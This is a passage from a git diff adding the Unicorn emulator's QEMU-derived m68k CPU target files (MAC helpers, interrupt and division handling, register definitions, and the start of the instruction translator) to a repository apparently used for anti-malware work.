*/ + product = 1ll << 50; + } else { + product &= ((1ull << 40) - 1); + } + } + return product; +} + +uint64_t HELPER(macmulf)(CPUM68KState *env, uint32_t op1, uint32_t op2) +{ + uint64_t product; + uint32_t remainder; + + product = (uint64_t)op1 * op2; + if (env->macsr & MACSR_RT) { + remainder = product & 0xffffff; + product >>= 24; + if (remainder > 0x800000) + product++; + else if (remainder == 0x800000) + product += (product & 1); + } else { + product >>= 24; + } + return product; +} + +void HELPER(macsats)(CPUM68KState *env, uint32_t acc) +{ + int64_t tmp; + int64_t result; + tmp = env->macc[acc]; + result = ((int64_t)((uint64_t)tmp << 16) >> 16); + if (result != tmp) { + env->macsr |= MACSR_V; + } + if (env->macsr & MACSR_V) { + env->macsr |= MACSR_PAV0 << acc; + if (env->macsr & MACSR_OMC) { + /* The result is saturated to 32 bits, despite overflow occurring + at 48 bits. Seems weird, but that's what the hardware docs + say. */ + result = (result >> 63) ^ 0x7fffffff; + } + } + env->macc[acc] = result; +} + +void HELPER(macsatu)(CPUM68KState *env, uint32_t acc) +{ + uint64_t val; + + val = env->macc[acc]; + if (val & (0xffffull << 48)) { + env->macsr |= MACSR_V; + } + if (env->macsr & MACSR_V) { + env->macsr |= MACSR_PAV0 << acc; + if (env->macsr & MACSR_OMC) { + if (val > (1ull << 53)) + val = 0; + else + val = (1ull << 48) - 1; + } else { + val &= ((1ull << 48) - 1); + } + } + env->macc[acc] = val; +} + +void HELPER(macsatf)(CPUM68KState *env, uint32_t acc) +{ + int64_t sum; + int64_t result; + + sum = env->macc[acc]; + result = ((int64_t)((uint64_t)sum << 16)) >> 16; + if (result != sum) { + env->macsr |= MACSR_V; + } + if (env->macsr & MACSR_V) { + env->macsr |= MACSR_PAV0 << acc; + if (env->macsr & MACSR_OMC) { + result = (result >> 63) ^ 0x7fffffffffffll; + } + } + env->macc[acc] = result; +} + +void HELPER(mac_set_flags)(CPUM68KState *env, uint32_t acc) +{ + uint64_t val; + val = env->macc[acc]; + if (val == 0) { + env->macsr |= MACSR_Z; + } else if 
(val & (1ull << 47)) { + env->macsr |= MACSR_N; + } + if (env->macsr & (MACSR_PAV0 << acc)) { + env->macsr |= MACSR_V; + } + if (env->macsr & MACSR_FI) { + val = ((int64_t)val) >> 40; + if (val != 0 && val != -1) + env->macsr |= MACSR_EV; + } else if (env->macsr & MACSR_SU) { + val = ((int64_t)val) >> 32; + if (val != 0 && val != -1) + env->macsr |= MACSR_EV; + } else { + if ((val >> 32) != 0) + env->macsr |= MACSR_EV; + } +} + +void HELPER(flush_flags)(CPUM68KState *env, uint32_t cc_op) +{ + cpu_m68k_flush_flags(env, cc_op); +} + +uint32_t HELPER(get_macf)(CPUM68KState *env, uint64_t val) +{ + int rem; + uint32_t result; + + if (env->macsr & MACSR_SU) { + /* 16-bit rounding. */ + rem = val & 0xffffff; + val = (val >> 24) & 0xffffu; + if (rem > 0x800000) + val++; + else if (rem == 0x800000) + val += (val & 1); + } else if (env->macsr & MACSR_RT) { + /* 32-bit rounding. */ + rem = val & 0xff; + val >>= 8; + if (rem > 0x80) + val++; + else if (rem == 0x80) + val += (val & 1); + } else { + /* No rounding. */ + val >>= 8; + } + if (env->macsr & MACSR_OMC) { + /* Saturate. */ + if (env->macsr & MACSR_SU) { + if (val != (uint16_t) val) { + result = ((val >> 63) ^ 0x7fff) & 0xffff; + } else { + result = val & 0xffff; + } + } else { + if (val != (uint32_t)val) { + result = ((uint32_t)(val >> 63) & 0x7fffffff); + } else { + result = (uint32_t)val; + } + } + } else { + /* No saturation. 
*/ + if (env->macsr & MACSR_SU) { + result = val & 0xffff; + } else { + result = (uint32_t)val; + } + } + return result; +} + +uint32_t HELPER(get_macs)(uint64_t val) +{ + if (val == (int32_t)val) { + return (int32_t)val; + } else { + return (val >> 61) ^ ~SIGNBIT; + } +} + +uint32_t HELPER(get_macu)(uint64_t val) +{ + if ((val >> 32) == 0) { + return (uint32_t)val; + } else { + return 0xffffffffu; + } +} + +uint32_t HELPER(get_mac_extf)(CPUM68KState *env, uint32_t acc) +{ + uint32_t val; + val = env->macc[acc] & 0x00ff; + val = (env->macc[acc] >> 32) & 0xff00; + val |= (env->macc[acc + 1] << 16) & 0x00ff0000; + val |= (env->macc[acc + 1] >> 16) & 0xff000000; + return val; +} + +uint32_t HELPER(get_mac_exti)(CPUM68KState *env, uint32_t acc) +{ + uint32_t val; + val = (env->macc[acc] >> 32) & 0xffff; + val |= (env->macc[acc + 1] >> 16) & 0xffff0000; + return val; +} + +void HELPER(set_mac_extf)(CPUM68KState *env, uint32_t val, uint32_t acc) +{ + int64_t res; + int32_t tmp; + res = env->macc[acc] & 0xffffffff00ull; + tmp = (int16_t)(val & 0xff00); + res |= ((uint64_t)((int64_t)tmp)) << 32; + res |= val & 0xff; + env->macc[acc] = res; + res = env->macc[acc + 1] & 0xffffffff00ull; + tmp = (val & 0xff000000); + res |= ((uint64_t)((int64_t)tmp)) << 16; + res |= (val >> 16) & 0xff; + env->macc[acc + 1] = res; +} + +void HELPER(set_mac_exts)(CPUM68KState *env, uint32_t val, uint32_t acc) +{ + int64_t res; + int32_t tmp; + res = (uint32_t)env->macc[acc]; + tmp = (int16_t)val; + res |= ((uint64_t)((int64_t)tmp)) << 32; + env->macc[acc] = res; + res = (uint32_t)env->macc[acc + 1]; + tmp = val & 0xffff0000; + res |= ((uint64_t)((int64_t)tmp)) << 16; + env->macc[acc + 1] = res; +} + +void HELPER(set_mac_extu)(CPUM68KState *env, uint32_t val, uint32_t acc) +{ + uint64_t res; + res = (uint32_t)env->macc[acc]; + res |= ((uint64_t)(val & 0xffff)) << 32; + env->macc[acc] = res; + res = (uint32_t)env->macc[acc + 1]; + res |= (uint64_t)(val & 0xffff0000) << 16; + env->macc[acc + 1] = 
res; +} + +void m68k_cpu_exec_enter(CPUState *cs) +{ + M68kCPU *cpu = M68K_CPU(cs->uc, cs); + CPUM68KState *env = &cpu->env; + + env->cc_op = CC_OP_FLAGS; + env->cc_dest = env->sr & 0xf; + env->cc_x = (env->sr >> 4) & 1; +} + +void m68k_cpu_exec_exit(CPUState *cs) +{ + M68kCPU *cpu = M68K_CPU(cs->uc, cs); + CPUM68KState *env = &cpu->env; + + cpu_m68k_flush_flags(env, env->cc_op); + env->cc_op = CC_OP_FLAGS; + env->sr = (env->sr & 0xffe0) | env->cc_dest | (env->cc_x << 4); +} diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/target-m68k/helper.h b/ai_anti_malware/unicorn/unicorn-master/qemu/target-m68k/helper.h new file mode 100644 index 0000000..caaadb3 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/target-m68k/helper.h @@ -0,0 +1,52 @@ +DEF_HELPER_4(uc_tracecode, void, i32, i32, ptr, i64) + +DEF_HELPER_1(bitrev, i32, i32) +DEF_HELPER_1(ff1, i32, i32) +DEF_HELPER_2(sats, i32, i32, i32) +DEF_HELPER_2(divu, void, env, i32) +DEF_HELPER_2(divs, void, env, i32) +DEF_HELPER_3(addx_cc, i32, env, i32, i32) +DEF_HELPER_3(subx_cc, i32, env, i32, i32) +DEF_HELPER_3(shl_cc, i32, env, i32, i32) +DEF_HELPER_3(shr_cc, i32, env, i32, i32) +DEF_HELPER_3(sar_cc, i32, env, i32, i32) +DEF_HELPER_2(xflag_lt, i32, i32, i32) +DEF_HELPER_2(set_sr, void, env, i32) +DEF_HELPER_3(movec, void, env, i32, i32) + +DEF_HELPER_2(f64_to_i32, f32, env, f64) +DEF_HELPER_2(f64_to_f32, f32, env, f64) +DEF_HELPER_2(i32_to_f64, f64, env, i32) +DEF_HELPER_2(f32_to_f64, f64, env, f32) +DEF_HELPER_2(iround_f64, f64, env, f64) +DEF_HELPER_2(itrunc_f64, f64, env, f64) +DEF_HELPER_2(sqrt_f64, f64, env, f64) +DEF_HELPER_1(abs_f64, f64, f64) +DEF_HELPER_1(chs_f64, f64, f64) +DEF_HELPER_3(add_f64, f64, env, f64, f64) +DEF_HELPER_3(sub_f64, f64, env, f64, f64) +DEF_HELPER_3(mul_f64, f64, env, f64, f64) +DEF_HELPER_3(div_f64, f64, env, f64, f64) +DEF_HELPER_3(sub_cmp_f64, f64, env, f64, f64) +DEF_HELPER_2(compare_f64, i32, env, f64) + +DEF_HELPER_3(mac_move, void, env, i32, i32) 
+DEF_HELPER_3(macmulf, i64, env, i32, i32) +DEF_HELPER_3(macmuls, i64, env, i32, i32) +DEF_HELPER_3(macmulu, i64, env, i32, i32) +DEF_HELPER_2(macsats, void, env, i32) +DEF_HELPER_2(macsatu, void, env, i32) +DEF_HELPER_2(macsatf, void, env, i32) +DEF_HELPER_2(mac_set_flags, void, env, i32) +DEF_HELPER_2(set_macsr, void, env, i32) +DEF_HELPER_2(get_macf, i32, env, i64) +DEF_HELPER_1(get_macs, i32, i64) +DEF_HELPER_1(get_macu, i32, i64) +DEF_HELPER_2(get_mac_extf, i32, env, i32) +DEF_HELPER_2(get_mac_exti, i32, env, i32) +DEF_HELPER_3(set_mac_extf, void, env, i32, i32) +DEF_HELPER_3(set_mac_exts, void, env, i32, i32) +DEF_HELPER_3(set_mac_extu, void, env, i32, i32) + +DEF_HELPER_2(flush_flags, void, env, i32) +DEF_HELPER_2(raise_exception, void, env, i32) diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/target-m68k/m68k-qreg.h b/ai_anti_malware/unicorn/unicorn-master/qemu/target-m68k/m68k-qreg.h new file mode 100644 index 0000000..c224d5e --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/target-m68k/m68k-qreg.h @@ -0,0 +1,11 @@ +enum { +#define DEFO32(name, offset) QREG_##name, +#define DEFR(name, reg, mode) QREG_##name, +#define DEFF64(name, offset) QREG_##name, + QREG_NULL, +#include "qregs.def" + TARGET_NUM_QREGS = 0x100 +#undef DEFO32 +#undef DEFR +#undef DEFF64 +}; diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/target-m68k/op_helper.c b/ai_anti_malware/unicorn/unicorn-master/qemu/target-m68k/op_helper.c new file mode 100644 index 0000000..2686e98 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/target-m68k/op_helper.c @@ -0,0 +1,225 @@ +/* + * M68K helper routines + * + * Copyright (c) 2007 CodeSourcery + * + * This library is free software; you can redistribute it and/or + * modify it under the terms of the GNU Lesser General Public + * License as published by the Free Software Foundation; either + * version 2 of the License, or (at your option) any later version. 
+ * + * This library is distributed in the hope that it will be useful, + * but WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU + * Lesser General Public License for more details. + * + * You should have received a copy of the GNU Lesser General Public + * License along with this library; if not, see . + */ +#include "cpu.h" +#include "exec/helper-proto.h" +#include "exec/cpu_ldst.h" + +#if defined(CONFIG_USER_ONLY) + +void m68k_cpu_do_interrupt(CPUState *cs) +{ + cs->exception_index = -1; +} + +static inline void do_interrupt_m68k_hardirq(CPUM68KState *env) +{ +} + +#else + +extern int semihosting_enabled; + +/* Try to fill the TLB and return an exception if error. If retaddr is + NULL, it means that the function was called in C code (i.e. not + from generated code or from helper.c) */ +void tlb_fill(CPUState *cs, target_ulong addr, int is_write, int mmu_idx, + uintptr_t retaddr) +{ + int ret; + + ret = m68k_cpu_handle_mmu_fault(cs, addr, is_write, mmu_idx); + if (unlikely(ret)) { + if (retaddr) { + /* now we have a real cpu fault */ + cpu_restore_state(cs, retaddr); + } + cpu_loop_exit(cs); + } +} + +static void do_rte(CPUM68KState *env) +{ + uint32_t sp; + uint32_t fmt; + + sp = env->aregs[7]; + fmt = cpu_ldl_kernel(env, sp); + env->pc = cpu_ldl_kernel(env, sp + 4); + sp |= (fmt >> 28) & 3; + env->sr = fmt & 0xffff; + m68k_switch_sp(env); + env->aregs[7] = sp + 8; +} + +static void do_interrupt_all(CPUM68KState *env, int is_hw) +{ + CPUState *cs = CPU(m68k_env_get_cpu(env)); + uint32_t sp; + uint32_t fmt; + uint32_t retaddr; + uint32_t vector; + + fmt = 0; + retaddr = env->pc; + + if (!is_hw) { + switch (cs->exception_index) { + case EXCP_RTE: + /* Return from an exception. 
*/ + do_rte(env); + return; + case EXCP_HALT_INSN: + cs->halted = 1; + cs->exception_index = EXCP_HLT; + cpu_loop_exit(cs); + return; + } + if (cs->exception_index >= EXCP_TRAP0 + && cs->exception_index <= EXCP_TRAP15) { + /* Move the PC after the trap instruction. */ + retaddr += 2; + } + } + + vector = cs->exception_index << 2; + + sp = env->aregs[7]; + + fmt |= 0x40000000; + fmt |= (sp & 3) << 28; + fmt |= vector << 16; + fmt |= env->sr; + + env->sr |= SR_S; + if (is_hw) { + env->sr = (env->sr & ~SR_I) | (env->pending_level << SR_I_SHIFT); + env->sr &= ~SR_M; + } + m68k_switch_sp(env); + + /* ??? This could cause MMU faults. */ + sp &= ~3; + sp -= 4; + cpu_stl_kernel(env, sp, retaddr); + sp -= 4; + cpu_stl_kernel(env, sp, fmt); + env->aregs[7] = sp; + /* Jump to vector. */ + env->pc = cpu_ldl_kernel(env, env->vbr + vector); +} + +void m68k_cpu_do_interrupt(CPUState *cs) +{ + M68kCPU *cpu = M68K_CPU(cs->uc, cs); + CPUM68KState *env = &cpu->env; + + do_interrupt_all(env, 0); +} + +static inline void do_interrupt_m68k_hardirq(CPUM68KState *env) +{ + do_interrupt_all(env, 1); +} +#endif + +bool m68k_cpu_exec_interrupt(CPUState *cs, int interrupt_request) +{ + M68kCPU *cpu = M68K_CPU(cs->uc, cs); + CPUM68KState *env = &cpu->env; + + if (interrupt_request & CPU_INTERRUPT_HARD + && ((env->sr & SR_I) >> SR_I_SHIFT) < env->pending_level) { + /* Real hardware gets the interrupt vector via an IACK cycle + at this point. Current emulated hardware doesn't rely on + this, so we provide/save the vector when the interrupt is + first signalled. 
*/ + cs->exception_index = env->pending_vector; + do_interrupt_m68k_hardirq(env); + return true; + } + return false; +} + +static void raise_exception(CPUM68KState *env, int tt) +{ + CPUState *cs = CPU(m68k_env_get_cpu(env)); + + cs->exception_index = tt; + cpu_loop_exit(cs); +} + +void HELPER(raise_exception)(CPUM68KState *env, uint32_t tt) +{ + raise_exception(env, tt); +} + +void HELPER(divu)(CPUM68KState *env, uint32_t word) +{ + uint32_t num; + uint32_t den; + uint32_t quot; + uint32_t rem; + uint32_t flags; + + num = env->div1; + den = env->div2; + /* ??? This needs to make sure the throwing location is accurate. */ + if (den == 0) { + raise_exception(env, EXCP_DIV0); + } + quot = num / den; + rem = num % den; + flags = 0; + if (word && quot > 0xffff) + flags |= CCF_V; + if (quot == 0) + flags |= CCF_Z; + else if ((int32_t)quot < 0) + flags |= CCF_N; + env->div1 = quot; + env->div2 = rem; + env->cc_dest = flags; +} + +void HELPER(divs)(CPUM68KState *env, uint32_t word) +{ + int32_t num; + int32_t den; + int32_t quot; + int32_t rem; + int32_t flags; + + num = env->div1; + den = env->div2; + if (den == 0) { + raise_exception(env, EXCP_DIV0); + } + quot = (int64_t)num / den; + rem = (int64_t)num % den; + flags = 0; + if (word && quot != (int16_t)quot) + flags |= CCF_V; + if (quot == 0) + flags |= CCF_Z; + else if (quot < 0) + flags |= CCF_N; + env->div1 = quot; + env->div2 = rem; + env->cc_dest = flags; +} diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/target-m68k/qregs.def b/ai_anti_malware/unicorn/unicorn-master/qemu/target-m68k/qregs.def new file mode 100644 index 0000000..204663e --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/target-m68k/qregs.def @@ -0,0 +1,11 @@ +DEFF64(FP_RESULT, fp_result) +DEFO32(PC, pc) +DEFO32(SR, sr) +DEFO32(CC_OP, cc_op) +DEFO32(CC_DEST, cc_dest) +DEFO32(CC_SRC, cc_src) +DEFO32(CC_X, cc_x) +DEFO32(DIV1, div1) +DEFO32(DIV2, div2) +DEFO32(MACSR, macsr) +DEFO32(MAC_MASK, mac_mask) diff --git 
a/ai_anti_malware/unicorn/unicorn-master/qemu/target-m68k/translate.c b/ai_anti_malware/unicorn/unicorn-master/qemu/target-m68k/translate.c new file mode 100644 index 0000000..7ada763 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/target-m68k/translate.c @@ -0,0 +1,3220 @@ +/* + * m68k translation + * + * Copyright (c) 2005-2007 CodeSourcery + * Written by Paul Brook + * + * This library is free software; you can redistribute it and/or + * modify it under the terms of the GNU Lesser General Public + * License as published by the Free Software Foundation; either + * version 2 of the License, or (at your option) any later version. + * + * This library is distributed in the hope that it will be useful, + * but WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU + * General Public License for more details. + * + * You should have received a copy of the GNU Lesser General Public + * License along with this library; if not, see . + */ + +#include "cpu.h" +#include "tcg-op.h" +#include "qemu/log.h" +#include "exec/cpu_ldst.h" + +#include "exec/helper-proto.h" +#include "exec/helper-gen.h" + +#include "exec/gen-icount.h" + +//#define DEBUG_DISPATCH 1 + +/* Fake floating point. 
*/ +#define tcg_gen_mov_f64 tcg_gen_mov_i64 +#define tcg_gen_qemu_ldf64 tcg_gen_qemu_ld64 +#define tcg_gen_qemu_stf64 tcg_gen_qemu_st64 + +#define DREG(insn, pos) *((TCGv *)tcg_ctx->cpu_dregs[((insn) >> (pos)) & 7]) +#define AREG(insn, pos) *((TCGv *)tcg_ctx->cpu_aregs[((insn) >> (pos)) & 7]) +#define FREG(insn, pos) tcg_ctx->cpu_fregs[((insn) >> (pos)) & 7] +#define MACREG(acc) tcg_ctx->cpu_macc[acc] +#define QREG_SP *((TCGv *)tcg_ctx->cpu_aregs[7]) + +#define IS_NULL_QREG(t) (TCGV_EQUAL(t, tcg_ctx->NULL_QREG)) + +void m68k_tcg_init(struct uc_struct *uc) +{ + TCGContext *tcg_ctx = uc->tcg_ctx; + char *p; + int i; + +#define DEFO32(name, offset) if (!uc->init_tcg) { tcg_ctx->QREG_##name = g_malloc0(sizeof(TCGv));} *((TCGv *)tcg_ctx->QREG_##name) = tcg_global_mem_new_i32(tcg_ctx, TCG_AREG0, offsetof(CPUM68KState, offset), #name); +#define DEFO64(name, offset) tcg_ctx->QREG_##name = tcg_global_mem_new_i64(tcg_ctx, TCG_AREG0, offsetof(CPUM68KState, offset), #name); +#define DEFF64(name, offset) DEFO64(name, offset) +#include "qregs.def" +#undef DEFO32 +#undef DEFO64 +#undef DEFF64 + + // tcg_ctx->QREG_FP_RESULT = tcg_global_mem_new_i64(tcg_ctx, TCG_AREG0, offsetof(CPUM68KState, fp_result), "FP_RESULT"); + + tcg_ctx->cpu_halted = tcg_global_mem_new_i32(tcg_ctx, TCG_AREG0, + 0-offsetof(M68kCPU, env) + + offsetof(CPUState, halted), "HALTED"); + + tcg_ctx->cpu_env = tcg_global_reg_new_ptr(tcg_ctx, TCG_AREG0, "env"); + + p = tcg_ctx->cpu_reg_names; + + for (i = 0; i < 8; i++) { + sprintf(p, "D%d", i); + if (!uc->init_tcg) + tcg_ctx->cpu_dregs[i] = g_malloc0(sizeof(TCGv)); + *((TCGv *)tcg_ctx->cpu_dregs[i]) = tcg_global_mem_new(tcg_ctx, TCG_AREG0, + offsetof(CPUM68KState, dregs[i]), p); + p += 3; + sprintf(p, "A%d", i); + if (!uc->init_tcg) + tcg_ctx->cpu_aregs[i] = g_malloc0(sizeof(TCGv)); + *((TCGv *)tcg_ctx->cpu_aregs[i]) = tcg_global_mem_new(tcg_ctx, TCG_AREG0, + offsetof(CPUM68KState, aregs[i]), p); + p += 3; + sprintf(p, "F%d", i); + tcg_ctx->cpu_fregs[i] = 
tcg_global_mem_new_i64(tcg_ctx, TCG_AREG0, + offsetof(CPUM68KState, fregs[i]), p); + p += 3; + } + + for (i = 0; i < 4; i++) { + sprintf(p, "ACC%d", i); + tcg_ctx->cpu_macc[i] = tcg_global_mem_new_i64(tcg_ctx, TCG_AREG0, + offsetof(CPUM68KState, macc[i]), p); + p += 5; + } + + if (!uc->init_tcg) + tcg_ctx->NULL_QREG = g_malloc0(sizeof(TCGv)); + *((TCGv *)tcg_ctx->NULL_QREG) = tcg_global_mem_new(tcg_ctx, TCG_AREG0, -4, "NULL"); + + if (!uc->init_tcg) + tcg_ctx->store_dummy = g_malloc0(sizeof(TCGv)); + *((TCGv *)tcg_ctx->store_dummy) = tcg_global_mem_new(tcg_ctx, TCG_AREG0, -8, "NULL"); + + uc->init_tcg = true; +} + +/* internal defines */ +typedef struct DisasContext { + CPUM68KState *env; + target_ulong insn_pc; /* Start of the current instruction. */ + target_ulong pc; + int is_jmp; + int cc_op; + int user; + uint32_t fpcr; + struct TranslationBlock *tb; + int singlestep_enabled; + int is_mem; + TCGv_i64 mactmp; + int done_mac; + + // Unicorn engine + struct uc_struct *uc; +} DisasContext; + +#define DISAS_JUMP_NEXT 4 + +#if defined(CONFIG_USER_ONLY) +#define IS_USER(s) 1 +#else +#define IS_USER(s) s->user +#endif + +#define OS_BYTE 0 +#define OS_WORD 1 +#define OS_LONG 2 +#define OS_SINGLE 4 +#define OS_DOUBLE 5 + +typedef void (*disas_proc)(CPUM68KState *env, DisasContext *s, uint16_t insn); + +#ifdef DEBUG_DISPATCH +#define DISAS_INSN(name) \ + static void real_disas_##name(CPUM68KState *env, DisasContext *s, \ + uint16_t insn); \ + static void disas_##name(CPUM68KState *env, DisasContext *s, \ + uint16_t insn) \ + { \ + qemu_log("Dispatch " #name "\n"); \ + real_disas_##name(s, env, insn); \ + } \ + static void real_disas_##name(CPUM68KState *env, DisasContext *s, \ + uint16_t insn) +#else +#define DISAS_INSN(name) \ + static void disas_##name(CPUM68KState *env, DisasContext *s, \ + uint16_t insn) +#endif + +/* Generate a load from the specified address. Narrow values are + sign extended to full register width. 
*/ +static inline TCGv gen_load(DisasContext * s, int opsize, TCGv addr, int sign) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv tmp; + int index = IS_USER(s); + s->is_mem = 1; + tmp = tcg_temp_new_i32(tcg_ctx); + switch(opsize) { + case OS_BYTE: + if (sign) + tcg_gen_qemu_ld8s(s->uc, tmp, addr, index); + else + tcg_gen_qemu_ld8u(s->uc, tmp, addr, index); + break; + case OS_WORD: + if (sign) + tcg_gen_qemu_ld16s(s->uc, tmp, addr, index); + else + tcg_gen_qemu_ld16u(s->uc, tmp, addr, index); + break; + case OS_LONG: + case OS_SINGLE: + tcg_gen_qemu_ld32u(s->uc, tmp, addr, index); + break; + default: + g_assert_not_reached(); + } + return tmp; +} + +static inline TCGv_i64 gen_load64(DisasContext * s, TCGv addr) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv_i64 tmp; + int index = IS_USER(s); + s->is_mem = 1; + tmp = tcg_temp_new_i64(tcg_ctx); + tcg_gen_qemu_ldf64(s->uc, tmp, addr, index); + return tmp; +} + +/* Generate a store. */ +static inline void gen_store(DisasContext *s, int opsize, TCGv addr, TCGv val) +{ + int index = IS_USER(s); + s->is_mem = 1; + switch(opsize) { + case OS_BYTE: + tcg_gen_qemu_st8(s->uc, val, addr, index); + break; + case OS_WORD: + tcg_gen_qemu_st16(s->uc, val, addr, index); + break; + case OS_LONG: + case OS_SINGLE: + tcg_gen_qemu_st32(s->uc, val, addr, index); + break; + default: + g_assert_not_reached(); + } +} + +static inline void gen_store64(DisasContext *s, TCGv addr, TCGv_i64 val) +{ + int index = IS_USER(s); + s->is_mem = 1; + tcg_gen_qemu_stf64(s->uc, val, addr, index); +} + +typedef enum { + EA_STORE, + EA_LOADU, + EA_LOADS +} ea_what; + +/* Generate an unsigned load if VAL is 0 a signed load if val is -1, + otherwise generate a store. 
*/ +static TCGv gen_ldst(DisasContext *s, int opsize, TCGv addr, TCGv val, + ea_what what) +{ + if (what == EA_STORE) { + TCGContext *tcg_ctx = s->uc->tcg_ctx; + gen_store(s, opsize, addr, val); + return *(TCGv *)tcg_ctx->store_dummy; + } else { + return gen_load(s, opsize, addr, what == EA_LOADS); + } +} + +/* Read a 32-bit immediate constant. */ +static inline uint32_t read_im32(CPUM68KState *env, DisasContext *s) +{ + uint32_t im; + im = ((uint32_t)cpu_lduw_code(env, s->pc)) << 16; + s->pc += 2; + im |= cpu_lduw_code(env, s->pc); + s->pc += 2; + return im; +} + +/* Calculate and address index. */ +static TCGv gen_addr_index(DisasContext *s, uint16_t ext, TCGv tmp) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv add; + int scale; + + add = (ext & 0x8000) ? AREG(ext, 12) : DREG(ext, 12); + if ((ext & 0x800) == 0) { + tcg_gen_ext16s_i32(tcg_ctx, tmp, add); + add = tmp; + } + scale = (ext >> 9) & 3; + if (scale != 0) { + tcg_gen_shli_i32(tcg_ctx, tmp, add, scale); + add = tmp; + } + return add; +} + +/* Handle a base + index + displacement effective addresss. + A NULL_QREG base means pc-relative. 
*/ +static TCGv gen_lea_indexed(CPUM68KState *env, DisasContext *s, int opsize, + TCGv base) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + uint32_t offset; + uint16_t ext; + TCGv add; + TCGv tmp; + uint32_t bd, od; + + offset = s->pc; + ext = cpu_lduw_code(env, s->pc); + s->pc += 2; + + if ((ext & 0x800) == 0 && !m68k_feature(s->env, M68K_FEATURE_WORD_INDEX)) + return *(TCGv *)tcg_ctx->NULL_QREG; + + if (ext & 0x100) { + /* full extension word format */ + if (!m68k_feature(s->env, M68K_FEATURE_EXT_FULL)) + return *(TCGv *)tcg_ctx->NULL_QREG; + + if ((ext & 0x30) > 0x10) { + /* base displacement */ + if ((ext & 0x30) == 0x20) { + bd = (int16_t)cpu_lduw_code(env, s->pc); + s->pc += 2; + } else { + bd = read_im32(env, s); + } + } else { + bd = 0; + } + tmp = tcg_temp_new(tcg_ctx); + if ((ext & 0x44) == 0) { + /* pre-index */ + add = gen_addr_index(s, ext, tmp); + } else { + add = *(TCGv *)tcg_ctx->NULL_QREG; + } + if ((ext & 0x80) == 0) { + /* base not suppressed */ + if (IS_NULL_QREG(base)) { + base = tcg_const_i32(tcg_ctx, offset + bd); + bd = 0; + } + if (!IS_NULL_QREG(add)) { + tcg_gen_add_i32(tcg_ctx, tmp, add, base); + add = tmp; + } else { + add = base; + } + } + if (!IS_NULL_QREG(add)) { + if (bd != 0) { + tcg_gen_addi_i32(tcg_ctx, tmp, add, bd); + add = tmp; + } + } else { + add = tcg_const_i32(tcg_ctx, bd); + } + if ((ext & 3) != 0) { + /* memory indirect */ + base = gen_load(s, OS_LONG, add, 0); + if ((ext & 0x44) == 4) { + add = gen_addr_index(s, ext, tmp); + tcg_gen_add_i32(tcg_ctx, tmp, add, base); + add = tmp; + } else { + add = base; + } + if ((ext & 3) > 1) { + /* outer displacement */ + if ((ext & 3) == 2) { + od = (int16_t)cpu_lduw_code(env, s->pc); + s->pc += 2; + } else { + od = read_im32(env, s); + } + } else { + od = 0; + } + if (od != 0) { + tcg_gen_addi_i32(tcg_ctx, tmp, add, od); + add = tmp; + } + } + } else { + /* brief extension word format */ + tmp = tcg_temp_new(tcg_ctx); + add = gen_addr_index(s, ext, tmp); + if (!IS_NULL_QREG(base)) { + 
tcg_gen_add_i32(tcg_ctx, tmp, add, base); + if ((int8_t)ext) + tcg_gen_addi_i32(tcg_ctx, tmp, tmp, (int8_t)ext); + } else { + tcg_gen_addi_i32(tcg_ctx, tmp, add, offset + (int8_t)ext); + } + add = tmp; + } + return add; +} + +/* Update the CPU env CC_OP state. */ +static inline void gen_flush_cc_op(DisasContext *s) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + if (s->cc_op != CC_OP_DYNAMIC) + tcg_gen_movi_i32(tcg_ctx, *(TCGv *)tcg_ctx->QREG_CC_OP, s->cc_op); +} + +/* Evaluate all the CC flags. */ +static inline void gen_flush_flags(DisasContext *s) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + if (s->cc_op == CC_OP_FLAGS) + return; + gen_flush_cc_op(s); + gen_helper_flush_flags(tcg_ctx, tcg_ctx->cpu_env, *(TCGv *)tcg_ctx->QREG_CC_OP); + s->cc_op = CC_OP_FLAGS; +} + +static void gen_logic_cc(DisasContext *s, TCGv val) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + tcg_gen_mov_i32(tcg_ctx, *(TCGv *)tcg_ctx->QREG_CC_DEST, val); + s->cc_op = CC_OP_LOGIC; +} + +static void gen_update_cc_add(DisasContext *s, TCGv dest, TCGv src) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + tcg_gen_mov_i32(tcg_ctx, *(TCGv *)tcg_ctx->QREG_CC_DEST, dest); + tcg_gen_mov_i32(tcg_ctx, *(TCGv *)tcg_ctx->QREG_CC_SRC, src); +} + +static inline int opsize_bytes(int opsize) +{ + switch (opsize) { + case OS_BYTE: return 1; + case OS_WORD: return 2; + case OS_LONG: return 4; + case OS_SINGLE: return 4; + case OS_DOUBLE: return 8; + default: + g_assert_not_reached(); + return 0; + } + + return 0; +} + +/* Assign value to a register. If the width is less than the register width + only the low part of the register is set. 
